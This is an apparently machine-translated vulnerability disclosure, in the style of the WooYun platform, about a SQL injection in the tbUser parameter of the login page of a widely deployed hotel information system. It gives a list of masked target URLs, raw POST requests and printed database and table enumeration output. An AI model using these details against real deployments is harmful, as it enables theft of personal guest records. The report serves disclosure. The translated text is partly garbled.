Open room information security-common SQL injection vulnerability in hotel information management system of a social platform (a large number of cases)

PS: Are you still worried about the lack of room information?

It was found that this system had a weak password, resulting in massive data leakage. Specific visible http: // **. **/bugs/wooyun-2010-0136212

Http: // **. **/bugs/wooyun-2010-0136013

Http: // **. **/bugs/wooyun-2010-0112009

And so on.

Unexpectedly, the general SQL injection vulnerability exists in the hotel information management system, a social  platform developed by Beijing Aerospace Gold Shield Technology Co., Ltd., which involves a large amount of open information, causing great harm.

System Architecture: ASPX + oracle

Vulnerability: SQL Injection Vulnerability

Vulnerability file:/Login. aspx

Injection parameter: tbUser

Perhaps others did not pay attention to the fact that this system is widely used, with both internal and external networks. After you start searching, you can check the Intranet. The public network system lists the following parts:

**. **/Hotelbs/default. aspx

**. **/Hotelbs/default. aspx

**. **/Hotelbs/default. aspx

**. **/Hotelbs/default. aspx

Http: // **. **: 8888/hotelbs/default. aspx

**. **: 8080/hotelbs/Login. aspx

**. **/Hotelbs/default. aspx

**. **/Hotelbs/default. aspx

**. **/Hotelbs164/default. aspx

**. **: 9080/hotelbs164/default. aspx

**. **/Hotelbs/default. aspx

**. **/Hotelbs/default. aspx

**. **/Hotelbs/default. aspx

**. **: 9080/hotelbs164/default. aspx

**. **/Hotelbs/default. aspx

Http: // **. **/default. aspx

**.**.**.**/**.**.**.**/

**. **: 8090/hotelbs/Login. aspx

**. **: 235/dylg /**.**.**.**/

Http: // **. **: 235/dylgy/login. aspx

**. **: 9090/Login. aspx

Http: // **. **/default. aspx

**. **: 88/default. aspx

**. **/Default. aspx

And so on.

All tests have injection problems.

For example:

For example: **. **/hotelbs/Login. aspx
 

 

POST /hotelbs/Login.aspx HTTP/1.1Accept: */*Accept-Language: zh-cnReferer: **.**.**.**/hotelbs/Login.aspxx-microsoftajax: Delta=trueContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.1; WOW64; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Host: **.**.**.**Content-Length: 854Proxy-Connection: Keep-AlivePragma: no-cacheCookie: ASP.NET_SessionId=p44xkz2zh14zes45lvc2qsmbsmMain=upTimer|ibtLogin&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTE1NjIxNDg0NjUPZBYCAgMPZBYCAgMPZBYCZg9kFgQCAQ9kFgQCAQ8PZBYCHgpvbktleVByZXNzBR1OZXh0Rm9jdXMoZXZlbnQsJ3RiUGFzc3dvcmQnKWQCBQ8PZBYCHwAFXWlmKGV2ZW50LmtleUNvZGU9PTEzKSB7IHZhciBidG5Mb2dpbj1kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnaWJ0TG9naW4nKTsgYnRuTG9naW4uY2xpY2soKTsgfWQCAw8PFgIeB1Zpc2libGVoFgIeB29uY2xpY2sFLW9wZW5XaW5kb3dFZHooJ3BvbGljZW1hbmlkY2FyZC5hc3B4P3R5cGU9MScpO2QYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCGlidExvZ2luF2UlMdPt0ZLKOPUi2%2BGLhhQlGLk%3D&__VIEWSTATEGENERATOR=5C4684BD&__EVENTVALIDATION=%2FwEWCwKxv9GtBgLGvdL3AQKr8tnHBgK3jsrkBAKM54rGBgLL%2FYu6AwKt6sazBAKu4tDbCgLDvJbUCgLvz4aZDgLavZ2gCrFNJVVkLTgGWyyYkOBQZZJkWBdn&tbUser=dasd&tbPassword=dasdsa&hdCert=&hdSSL=&hdSerial=&hdUrl=http%3A%2F%2F**.**.**.**%2Fhotelbs%2F&stationID=&scanType=&ibtLogin.x=28&ibtLogin.y=15

 

26 databases involved:
 

available databases [26]:[*] "SYS"[*] CTXSYS[*] DBSNMP[*] DDYSYS[*] DMSYS[*] ESJSYS[*] EXFSYS[*] FJJSSGYSYS[*] HOTELBS[*] JXYSYS[*] KSYSYS[*] MANSYS[*] MDSYS[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] SCOTT[*] SPECIALUSEROUT[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] WTJMYSYS[*] XDB[*] YLYSYS[*] YZYSYS

A large amount of data is stored in the SPECIALUSEROUT database and ipvbs.
 

Database: SPECIALUSEROUT[19 tables]+---------------------+| DATACENTER          || DEFUPDATE           || DIALPHONE           || EXTRACTLOG          || FZXX                || HOTEL               || HOTEL_141           || MESSAGE             || MSGFEEDBACK         || RECEIVELOG          || SENDLOG             || STATIONLIST         || STATIONLIST20150529 || STATIONLIST_LL      || STATIONLIST_NEW     || STATIONLIST_S       || STATIONLIST_SS      || T2                  || T3                  |+---------------------+

Or:

**. **: 8080/hotelbs/Login. aspx
 

 

POST /hotelbs/Login.aspx HTTP/1.1Accept: */*Accept-Language: zh-cnReferer: **.**.**.**:8080/hotelbs/Login.aspxx-microsoftajax: Delta=trueContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/7.0)Host: **.**.**.**:8080Content-Length: 840Proxy-Connection: Keep-AlivePragma: no-cacheCookie: ASP.NET_SessionId=upqudpeyckpgh3ndankezt3asmMain=upTimer|ibtLogin&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTM3MjI1OTM0NA9kFgICAw9kFgICAw9kFgJmD2QWBAIBD2QWBAIBDw9kFgIeCm9uS2V5UHJlc3MFHU5leHRGb2N1cyhldmVudCwndGJQYXNzd29yZCcpZAIFDw9kFgIfAAVdaWYoZXZlbnQua2V5Q29kZT09MTMpIHsgdmFyIGJ0bkxvZ2luPWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdpYnRMb2dpbicpOyBidG5Mb2dpbi5jbGljaygpOyB9ZAIDDw8WAh4HVmlzaWJsZWgWAh4Hb25jbGljawUtb3BlbldpbmRvd0VkeigncG9saWNlbWFuaWRjYXJkLmFzcHg%2FdHlwZT0xJyk7ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIaWJ0TG9naW5NivBG5%2Fq0vKzajP8hBaq5VFL%2FoQ%3D%3D&__EVENTVALIDATION=%2FwEWCwK61ri%2BDQLGvdL3AQKr8tnHBgK3jsrkBAKM54rGBgLL%2FYu6AwKt6sazBAKu4tDbCgLDvJbUCgLvz4aZDgLavZ2gCmLVRsrSAJUQLp4Lntals7A%2FzRRb&tbUser=dasdasd&tbPassword=dasdadsads&hdCert=&hdSSL=&hdSerial=&hdUrl=http%3A%2F%2F**.**.**.**%2Fhotelbs%2F&stationID=&scanType=&ibtLogin.x=43&ibtLogin.y=10

 

Database:
 

Solution:

The system is very old. Upgrade and filter it out.